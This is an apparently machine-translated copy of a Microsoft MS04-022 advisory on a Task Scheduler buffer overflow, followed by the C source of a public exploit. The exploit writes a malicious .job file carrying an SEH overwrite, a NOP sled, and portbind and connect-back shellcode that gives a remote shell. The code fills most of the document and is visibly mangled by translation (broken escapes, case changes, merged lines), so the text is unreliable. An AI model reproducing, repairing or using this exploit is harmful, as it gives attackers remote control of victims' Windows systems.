Microsoft Security Announcement MS04-022 Spill Attack Code
Vulnerability Description Task Scheduler Vulnerability - CAN-2004-0212
How big is this vulnerability range? This is a remote execution code vulnerability. If the user logs in using administrative privileges, the attacker that successfully utilizes this vulnerability can fully control the affected system, including the installer; view, change, or delete data; or create a new account with full permissions. Users who have been configured to have fewer system privileges are smaller than those with managed users. However, it is necessary to use this vulnerability to make user interaction.
What is this vulnerability? Unchecked buffers in the task planning program component.
What is a task plan program? You can use a task plan program to schedule a command, program or script at a specific time. You can save the task as a file with the .job file extension. In this way, it is more convenient to move task information between the system. Administrators can create a planned maintenance task file and put it in a need. For more information, see the Task Scheduler Web site.
What is the attacker that can use this vulnerability? An attacker who successfully utilized this vulnerability fully controls the affected system, including: installation program; view, change, or delete data; or create new accounts with full permissions, etc.
How do attackers use this vulnerability? An attacker may use a variety of ways to attack the system. Here are some examples:
• An attacker may have a malicious Web site designed to take advantage of this vulnerability through Internet Explorer, and then seduce the user to view this Web site. • An attacker may add a special .job file to a local file system or network share, then induce the user to use the Windows Explorer to view the folder. • An attacker may also access the affected components through other media. For example, an attacker can log in to the system by interactively, or use other programs to pass parameters to components that are easily attacked (local or remote) to log in to the system.
Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)
/ * HOD-MS04022-TASK-EXPL.C: * * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit * * Exploit Version 0.1 Coded By * * *. :: [HouseOfdabus] ::. * * * [AT Inbox Dot Ru] * ----------------------------------------- -------------------------- * TESTED ON: * - Internet Explorer 6.0 (sp1) (ipplore.exe) * - Explorer (Explorer.exe ) * - Windows XP SP0, SP1 * * ---------------------------------------- --------------------------- * Compile: * Win32 / VC : CL HOD-MS04022-Task-expl.c * Win32 / Cygwin: GCC HOD-MS04022-TASK-EXPL.C -LWS2_32.LIB * Linux: GCC -O HOD-MS04022-Task-Expl HOD-MS04022-Task-Expl.c * * ------------ -------------------------------------------------- ----- * Command line parameters / arguments: * * hod.exe
#include
/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x 90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / X61 / x00 / x00 "" / x61 / x00 / x00 / x00 / x00 / x61 / x00 "" / x1e / x82 / xdc / X77 "/ * 0x77DC821E - POP REG, POP REG, RET (Advapi32.dll) * // * for Win2k USE JMP EBX OR CALL EBX * /" / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 "" / x80 "/ * generate exceptation * /" / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00 " "/ x90 / x90"; / * portbind shellcode * / unsigned char portbindsc [] = "/ x90 / x90" / x90 / x90 / xeb / x06 "
/ * overwrite seh-frame * / "/ x90 / x90" "/ x90 / x90 / x90 / x90" "/ x90 / x90 / x90 / x90" "/ Xeb / x70 / x56 / x33 / xc0 / x64 / x8b / X40 / X30 / x85 / XC0 / X78 / X0C / X8B / X40 / X0C "" / x8b / x70 / x1c / xad / x8b / x40 / x08 / Xeb / x09 / x8b / x40 / x34 / x8d / x40 / x7c / X8B "" / x40 / x3c / x5e / xc3 / x60 / x8b / x6c / x24 / x24 / x8b / x45 / x3c / x8b / x54 / x05 / x78 "" / x03 / xd5 / x8b / x4a / x18 / x8b / X5A / X20 / X03 / XDD / XE3 / X34 / X8B "" / X03 / XF5 / X33 / XFF / X33 / XC0 / XFC / XAC / X84 / XC0 / X74 / X07 / XC1 / XCF / X0D / X03 "/ XF8 / XEB / XDD / X5A / X24 / X03 / XDD / X66 / X8B" "/ X0C / X4B / X8B / X5A / X1C / X03 / XDD / X8B / X04 / X8B / X03 / XC5 / X89 / X44 / X24 / X1C "" / X61 / XC3 / XEB / X3D / XAD / X50 / X52 / XE8 / XA8 / XFF / XFF / XFF / X89 / X07 / x83 / xc4 "" / x08 / x83 / xc7 / x04 / x3b / x8e / x4e / x0e / xec / x72 / xfe / xb3 "" / x16 / x7e / xd8 / xe2 / X73 / XAD / XD9 / X05 / XCE / XD9 / X09 / XF5 / XAD / XA4 / X1A / X70 "" / XC7 / XA4 / XAD / X2E / XE9 / XE5 / X49 / X86 / X49 / XCB / XED / XFC / X3B / XE7 / X79 / XC6 "" / x79 / x83 / xec / x60 / x8b / x05 / x-x02 / x02 / xff / xff / xff / x5e "" / XE8 / X3D / XFF / XFF / XFF / X8B / XD0 / X83 / XEE / X04 / X8B / XCE / X83 "" / XC1 / X10 / XE8 / X9D / XFF / XFF / XFF / X83 / XC1 / X18 / X33 / XC0 / X66 / XB8 / X33 / X32 "" / x5 0 / X68 / X77 / X73 / X32 / X5F / X52 / X53 / XFF / X55 / X04 / X5A / X59 "" / X8B / XD0 / XE8 / X7D / XFF / XFF / XFF / XB8 / X01 / X63 / X6D / X64 / XC1 / XF8 / X08 / X50 "" / x89 / x65 / x34 / x33 / xc0 / x66 / xb8 / x90 / x01 / x2b / xe0 / x54 / x83 / xc0 / x72 / x50 " "/ XFF / X55 / X24 / X33 / XC0 / X50 / X50 / X50 / X40 / X50 / XFF / X55 / X14" "/ x8b / xf0 / x33 / xc0 / x33 / xdb / x50 / X50 / X50 / XB8 / X02 / X01 / X11 / X5C / XFE / XCC "" / X50 / x8b / xc4 / xb3 / x10 / x53 / x50 / x56 / x56 / x18 / x53 / x56 / xff / x55 / X1C "" / x53 / x8b / xd4 / x2b / x51 / x56 / xff / x55 / x20 / x8b / xf0 / x33 "" / xc9 / xb1 / x54 / x2b / xe1 / x8b / XFC / X57 / X33 / XC0 / XF3 / XAA / X5F / XC6 / X07 / X44 "" "
/ XFE / X47 / X2D / X57 / X7F / X38 / XAb / XAb / XAb / X5F / X33 / XC0 / X8D "" / x77 / x44 / x56 / x57 / x50 / x50 / x50 / x40 / X50 / X48 / X50 / X50 / XFF / X75 / X34 / X50 "" / XFF / X55 / X08 / XF7 / XD0 / X50 / XFF / X36 / XFF / X55 / X10 / XFF / X77 / X38 / XFF / X55 "/ x28 / xff / x55 / x0c"; / * connectback shellcode * / unsigned char connectionbacksc [] = "/ x90 / x90" "/ x90 / x90 / x06" / * overwrite seh-frame * / "/" / * overwrite seh-frame * / X90 / X90 "/ x90 / x90 / x90 / x90" "/ x90 / x90 / x90 / x90" "/ XEB / X70 / X56 / X33 / XC0 / X64 / X8B / X40 / X30 / X85 / XC0 / X78 / X0C / X8B / X40 / X0C "" / x8b / x70 / x08 / x34 / x8d / x40 / x7c / x8b "" / x40 / x3c / x5e / XC3 / X60 / X8B / X6C / X24 / X24 / X8B / X54 / X05 / X78 "" / x03 / xd5 / x8b / x4a / x18 / x8b / x5a / x20 / x03 / xdd / xe3 / X34 / X49 / X8B / X34 / X8B "" / X03 / XF5 / X33 / XC / X33 / XC0 / X74 / X07 / XC1 / XCF / XEB / X03 "" "" "" "" "" "" "" "" "" "" XF4 / X3B / X7C / X24 / X28 / X75 / XE1 / X8B / X5A / X24 / X03 / XDD / X66 / X8B "" / X0C / X4B / X8B / X5A / X1C / X03 / XDD / X8B / X04 / X8B / X03 / XC5 / X89 / X44 / X24 / X1C "" / X61 / XC3 / XEB / X35 / XAD / X50 / X52 / XE8 / XA8 / X07 / X83 / XC4 "" "/ x08 / X83 / XC7 / X04 / X3B / XF1 / X75 / XEC / XC3 / X8E / X4E / X0E / XEC / X72 / XFE / XB3 "" / X16 / X7E / XD8 / XE2 / X73 / XAD / X D9 / X05 / XCE / XD9 / X09 / XF5 / XAD / XEC / XF9 / XAA "" / X60 / XCB / XED / XFC / X3B / XE7 / X79 / XC6 / X79 / X83 / XEC / X60 / X8B / XEC / XEB / X02 "" / XEB / X05 / XE8 / XD9 / XFF / XFF / XFF / XD0 / X83 "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "/ XEE / X2E / X8D / X7D / X04 / X8B / XCE / X83 / XC1 / X10 / XE8 / XA5 / XFF / XFF / XFF / X83 "" / XC1 / X10 / X33 / XC0 / X66 / XB8 / X33 / X32 / X50 / X68 / X77 / X73 / X32 / X5F / X8B / XDC "" / X51 / X52 / X53 / XFF / X55 / X04 / XD0 / XE8 / X85 / XFF / XFF / XFF / XB8 "" / X01 / X63 / X6D / X64 / XC1 / XF8 / X08 / X50 / X89 / XC0 / X66 / XB8 / X90 "" / X01 / X2B / XE0 / X72 / X50 / XFF / X55 / X1C / X33 / XC0 / X50 / X50 / X50 "" "
/ x50 / x40 / x50 / x40 / x50 / xff / x55 / x14 / x8b / xf0 / x68 / x7f / x01 / x01 / x01 / xb8 "" / x02 / x01 / x11 / x5c / xfe / xcc / x50 / x8b / XDC / X33 / XC0 / XB0 / X10 / X50 / X53 / X56 "" / XFF / X55 / X18 / X54 / X2B / XE1 / X8B / XFC / X57 / X33 / XC0 / XF3 / XAA "" / x5f / xc6 / x07 / x44 / xfe / x47 / x2d / x57 / x8b / xc6 / x8d / x7f / x38 / xab / xab / xab "" / x5f / x33 / xc0 / x8d / x77 / x44 / x56 / x57 / x50 / x50 / x50 / x40 / x50 "" / xff / x75 / x30 / x50 / xff / x55 / x08 / xf7 / xd0 / x50 / xff / x36 / xff / x55 / x10 / XFF "/ x77 / x38 / x55 / x0c"; / * use this formunsigned char sc [] = "/ x90 / x90" / x90 / x90 / xeb / x06 "- Overwrite SEH-FRAME "/ x90 / x90" "/ x90 / x90 / x90 / x90" "/ x90 / x90 / x90 / x90" ... code ... "; * / unsigned char endofjob [] =" / x00 / x00 / x00 / x00 "; #define set_portbind_port (buf, port) * ((BUF) 300 16)) = (port) #define set_connectback_ip (buf, ip) * (unsigned long * ((BUF) 283 16)) = (ip) #define set_connectback_port (buf, port) * ((BUF) 290 16)) = (port) Voidusage (char * prog ) {Printf ("USAGE: / N"); Printf ("% s
2) USAGE (Argv [0]); fp = fopen (Argv [1], "WB"); if (fp == null) {printf ("[-] error: can / 't create file:% s / N ", argv [1]); exit (0);} / * header & garbage * / fwrite (jobfile, 1, sizeof (jobfile) -1, fp); FSeek (FP, 39 * 16, seek_set); Port = ATOI (Argv [3]); Printf ("[*] shellcode:"); if (sc == 1) {set_portbind_port (portbindsc, htons (port)); Printf ("Portbind, port =% U / N ", port); fwrite (portbindsc, 1, sizeof (portbindsc) -1, fp); fwrite (endofjob, 1, 4, fp); FSeek (FP, 70, seek_set); / * Calculate length (see header) * * / strlen = (sizeof (jobfile) -1-71 sizeof (portbindsc) -1 4) / 2;} else {ip = inet_addr (argv [4]); SET_CONNECTBACK_IP (connectbacksc, ip); SET_CONNECTBACK_PORT (connectbacksc, htons (port); Printf ("Connectback, Port =% U, IP =% S / N", Port, Argv [4]); FWRITE (ConnectBacksc, 1, Sizeof (ConnectBacksc) -1, FP); FWRITE (Endofjob , 1, 4, fp); FSEEK (FP, 70, Seek_set); / * Calculate Length * / Strlen = (Sizeof (Jobfile) -1-71 Sizeof (ConnectBacksc) -1 4) / 2 }Printf ("[*] generat E File:% S / N ", Argv [1]); FWRITE (& Strlen, 1, 2, fp); fclose (fp); Return 0;}